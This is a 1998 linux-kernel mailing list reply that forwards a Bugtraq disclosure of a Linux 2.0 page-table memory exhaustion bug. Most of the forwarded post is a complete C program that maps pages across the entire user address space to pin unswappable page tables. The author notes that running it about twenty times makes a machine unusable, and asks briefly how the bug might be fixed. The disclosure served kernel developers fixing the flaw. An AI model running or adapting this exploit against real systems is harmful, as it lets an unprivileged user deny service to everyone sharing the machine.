On Mon, Oct 12, 1998 at 08:54:04PM +0100, Alan Cox wrote:
> > What about the PGE/PTE problem? Any user can just mmap/munmap
> > all possible (768 under x86) page tables for their process, then
> > use up a lot of GFP_KERNEL
>
> Do you have a demo for this ?
Here is a message about if from BUGTRAQ some time back.
-cw
--82I3+IH0IqGh5yIs
Content-Type: message/rfc822
Return-Path: <owner-bugtraq@NETSPACE.ORG>
X-Mailer: ELM [version 2.4ME+ PL35 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-ID: <199805251151.NAA01512@ippc72.infop6.cicrp.jussieu.fr>
Date: Mon, 25 May 1998 13:51:42 +0200
Reply-To: XXX_p6mip300 <p6mip300@INFOP6.CICRP.JUSSIEU.FR>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: XXX_p6mip300 <p6mip300@INFOP6.CICRP.JUSSIEU.FR>
Subject: linux 2.0 PTE bug
To: BUGTRAQ@NETSPACE.ORG
Hi all,
there is the program :
--------------------------------------------------------------------------
/* the pte bug - Sed hacking linux kernel, 24 may 1998 */
unsigned long address;
int touch_me;
int fd;
#include <signal.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
void the_handler(int x)
{
signal(SIGSEGV, the_handler);
touch_me++;
if(mmap((void *)address, 4, PROT_READ,
MAP_FIXED|MAP_PRIVATE, fd, 0)==(void *)-1) {
perror("mmap");
exit(1);
}
}
void main(void)
{
/* volatile to fool GCC, we _WANT_ access *address */
volatile unsigned long i;
fd=open("pte.c", O_RDONLY);
if (fd==-1) {
perror("open");
exit(1);
}
signal(SIGSEGV, the_handler);
/* 3*1024*1024*1024 = TASK_SIZE,
* 1024*4096 = number of bytes one pte can map */
for (address=0; address<3*1024*1024*1024; address+=1024*4096) {
i=*(unsigned long *)address;
if (touch_me) {
touch_me=0;
munmap((void *)address, 4);
}
}
while(1)
pause();
}
-----------------------------------------------------------------------
The idea is to take a lot of memory. So, we map all our virtual pages,
to force the system to allow all the pte (am talking about PC box).
So, the process will have allocated 768 pages that will never be
swapped (that's the crucial point).
So, that's simple, you run this program as much time as you need to take
all the memory, and the PC won't be usable anymore (for my 64Mb box,
i need to run it about 20 times).
And then, you can have a wonderful light-show with your HD-led :) (PC will
spend its time in swapping).
How to solve it ?
Well, we could swap the pgd / pmd / pte, but i really don't know
if it is possible or what.
If this bug is already well know, am sorry to disturb with it.
It applies only on the 2.0 kernel, for the 2.1 (soon 2.2) i don't know
if it works, will have to read the source.
Sed.
p6mip300@infop6.cicrp.jussieu.fr.
--82I3+IH0IqGh5yIs--
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/